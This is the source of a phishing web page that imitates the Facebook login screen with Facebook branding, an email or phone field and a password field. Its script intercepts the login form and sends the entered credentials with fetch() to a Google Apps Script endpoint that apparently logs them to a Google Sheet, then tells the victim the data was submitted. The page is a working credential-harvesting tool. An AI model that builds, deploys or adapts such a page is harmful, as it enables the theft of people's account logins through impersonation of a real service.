<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook Login</title>
    <style>
       
        body
       {
        margin: 1% 30%;
        align-items: center;
        /* background-color: rgb(175, 170, 170); */
        background-color: rgb(223, 219, 219);
        
       }
        .contener
        {
            min-width: 50px;
            /* border: 1px solid black; */
            padding: 50px 30px;
               text-align: center;
    font-size: 20px;
    /* color: #ffff; */
    background-color: #fff;
    border-radius: 15px;
        }
        .ps
        {
           min-height: 56%;
        }
        hr
        {
            width: 100%;
        }
        input[type=text]
        {
            border: 1px solid black;
            width: 100%;
             padding: 8px; 
             border-radius: 4px; 
            box-sizing: border-box; 
            margin: 8px 0;
            transition: 1s;
            outline: none;
            font-size: 15px;
        }
        input[type=text]:focus
        {
            border-color: dodgerblue;
            box-shadow: 0 0 8px 0 dodgerblue;
        }
        input[type=password]
        {
            border: 1px solid black;
            width: 100%;
             padding: 8px; 
             border-radius: 4px; 
            box-sizing: border-box; 
            margin: 8px 0;
            transition: 1s;
            outline: none;
            font-size: 15px;
        }
        input[type=password]:focus
        {
            border-color: dodgerblue;
            box-shadow: 0 0 8px 0 dodgerblue;
        }
        div.contener
        {
            width: 90%;
        }
        .text
        {
            width: 100%;
            padding: 8px;
            background-color: blue;
            color: #fff;
            border: 1px solid #fff;
            border-radius: 6px;
            font-size: 15px;
            font-style: bold;
        }
        .cr
        {
            width: 70%;
            padding: 8px;
            background-color: rgb(46, 204, 46);
            color: #fff;
            border: 1px solid #fff;
            border-radius: 6px;
            font-size: 15px;
            font-style: bold; 
        }
        p
        {
            color: blue;
            font-size: 15px;
        }
        h1
        {
            font-size: 50px;
            color: blue;
        }
    </style>
</head>
<body>
    <h1>
        facebook
    </h1>
   <div class="contener">
    <div>
        <form action="POST" autocomplete="off" name="google-sheet">
    <input type="text" placeholder="Email address or phone number" name="Email address or phone number" >
    <br><br>
    <input type="password" placeholder="Password" name="Password">
    <br><br>
    <input type="submit" value="Login" class="text" name="Submit">
    <br><br>
    <p>Forgotten Password</p>
    </from>
    <hr>
    <br>
    <a href="Create New Account.html">
    <input type="button" value="Create New Account" class="cr">
    </a>
    </div>
   </div> 
   
   <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    <b>
        Create a page
    </b>
    for a celebrity,band or business.
    <script>
        function re()
        {
            Name.value=""
        }
        const scriptURL = 'https://script.google.com/macros/s/AKfycbx1nIpng4bgIj42Glw9ulQSR9vTDoZDfPua64TxjquezuJQmZqe/exec'
        const form = document.forms['google-sheet']
      
        form.addEventListener('submit', e => {
          e.preventDefault()
          fetch(scriptURL, { method: 'POST', body: new FormData(form)})
            .then(response => document.write("Your Data Successfully Submitted"))
            .catch(error => console.error('Error!', error.message))
        })
      </script>

    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
</body>
</html>